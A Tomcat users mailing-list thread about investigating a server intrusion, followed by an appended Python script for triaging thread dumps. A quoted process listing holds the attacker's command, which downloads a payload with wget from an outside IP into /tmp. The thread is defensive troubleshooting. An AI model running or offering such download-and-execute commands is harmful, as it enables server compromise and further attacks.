Leonardo,
You need to post a thread dump as well.

-chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list,
>
> Well, my homework is done.
>
> Here are the links:
>
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij
>
> Note that logsfiles are not the logfiles themselves but only an ls -lah
> (just for you to see the log sizes).
>
> A little more about the infrastructure I've mounted; I'll do some
> ASCII art.
>
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
> Apache(2) is serving static content, so haproxy(1) at the first
> level does HTTP round-robin balancing. Apache(2) connects to
> tomcat(5) through haproxy(4) (using an L4 connection) using mod_jk(3).
> Tomcat(5) are the main app servers (the ones that get intruded), which
> use tomcat(7) (Solr service) through haproxy(6) using an L4
> connection.
>
> Versions:
>
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
>
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
> OS: CentOS 5.8 64 bit
>
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
>
> For now I haven't seen that the squid process was launched, so I
> couldn't do a dump.
>
> Let me know if you need more information.
>
> BTW, pastebin links will work for one week.
>
> Kind regards, yours
>
> Saludos.-
> Leonardo Santagostini
> <http://ar.linkedin.com/in/santagostini>
>
>
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
>
>> Ok, I will do the following:
>>
>> 1) thread dump of running tomcat instance
>> 2) Pastebin the running tomcat config
>>
>> I think at midday I will have all the info.
>>
>> Thanks all for replying to me and for all the responses.
>>
>> Regards,
>> Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:
>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>>> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>:
>>>>> Hello Dan,
>>>>>
>>>>> Nope, the attacker is executing locally the following:
>>>>>
>>>>> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
>>>>> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>>>>
>>>>> And then launches squid, which tries to connect via ssh to
>>>>> various places.
>>>>>
>>>>> Right now it's time to leave the office, but in a few hours
>>>>> I will paste in pastebin access logs, config files,
>>>>> whatever you tell me.
>>>>>
>>>>> This is my pstree:
>>>>>
>>>>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>>>>> init─┬─atd
>>>>>      ├─java─┬─sh───wget
>>>>>      │      └─263*[{java}]
>>>>
>>>> sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not
>>> just any JVM process.
>>>
>>>> Take a thread dump:
>>>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>>>
>>>> It shall show what the stack trace is in the thread that launched the external
>>>> process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec()
>>> are the CGI servlet and SSI, both of which are disabled by
>>> default. So, either you have an insecure CGI/SSI
>>> configuration, your web application has a vulnerability, or you
>>> have deployed something like the Manager application and
>>> improperly secured it.
>>>
>>> A classic example of such an intrusion might be that someone
>>> got a foothold elsewhere into your network, and the Manager
>>> web application is not properly secured with a password, etc.
>>>
>>> -chris
>>>
>>> ---------------------------------------------------------------------
>>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>>> For additional commands, e-mail: users-h...@tomcat.apache.org
>>>
>>
>
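The thread-dump triage Konstantin and Chris ask for above, as an added example that is not part of this thread: it scans a jstack-style dump for threads whose stack passes through the JDK process-spawning frames and reports the application frames beneath them, which is what tells a CGI/SSI misconfiguration apart from a webapp's own exec call. The sample dump, the servlet name and the frame marker list are constructed for illustration.

```python
import re

# Frames that show a thread is spawning an external process. On Java 6 HotSpot
# (the JVM in this thread) Runtime.exec() runs through ProcessBuilder.start()
# and java.lang.UNIXProcess. Marker list is an assumption for this example.
EXEC_MARKERS = ("java.lang.ProcessBuilder.start",
                "java.lang.UNIXProcess",
                "java.lang.Runtime.exec")

THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')
FRAME = re.compile(r'^\s+at\s+(?P<frame>[^(\s]+)')

def parse_thread_dump(text):
    """Return a list of (thread_name, [frames]) from a jstack-style dump."""
    threads, current = [], None
    for line in text.splitlines():
        m = THREAD_HEADER.match(line)
        if m:
            current = (m.group("name"), [])
            threads.append(current)
            continue
        f = FRAME.match(line)
        if f and current is not None:
            current[1].append(f.group("frame"))
    return threads

def find_exec_threads(text):
    """Map each process-spawning thread to the first non-JDK frames below the
    exec marker, i.e. the code that actually asked for the process."""
    findings = {}
    for name, frames in parse_thread_dump(text):
        for i, frame in enumerate(frames):
            if frame.startswith(EXEC_MARKERS):
                callers = [fr for fr in frames[i + 1:]
                           if not fr.startswith(("java.", "sun."))]
                findings[name] = callers[:3]
                break
    return findings

# Constructed sample dump (not from the reporter's system): one worker thread
# spawning a process from a hypothetical webapp servlet, one idle worker.
SAMPLE_DUMP = """\
"http-bio-8080-exec-7" daemon prio=10 tid=0x... nid=0x22c2 runnable [0x...]
   java.lang.Thread.State: RUNNABLE
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.UNIXProcess.<init>(UNIXProcess.java:53)
        at java.lang.ProcessImpl.start(ProcessImpl.java:65)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:452)
        at java.lang.Runtime.exec(Runtime.java:593)
        at com.example.app.UploadServlet.doPost(UploadServlet.java:88)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:305)

"http-bio-8080-exec-8" daemon prio=10 tid=0x... nid=0x22c3 waiting on condition [0x...]
   java.lang.Thread.State: WAITING (parking)
        at sun.misc.Unsafe.park(Native Method)
        at java.util.concurrent.locks.LockSupport.park(LockSupport.java:156)
        at org.apache.tomcat.util.threads.TaskQueue.take(TaskQueue.java:104)
"""

if __name__ == "__main__":
    for thread, callers in find_exec_threads(SAMPLE_DUMP).items():
        print(thread, "->", callers)
```

Run it against a real dump by reading the file into `find_exec_threads`; a hit under `org.apache.catalina.servlets.CGIServlet` or the SSI classes points at the configuration Chris mentions, while a hit under the application's own package points at the webapp.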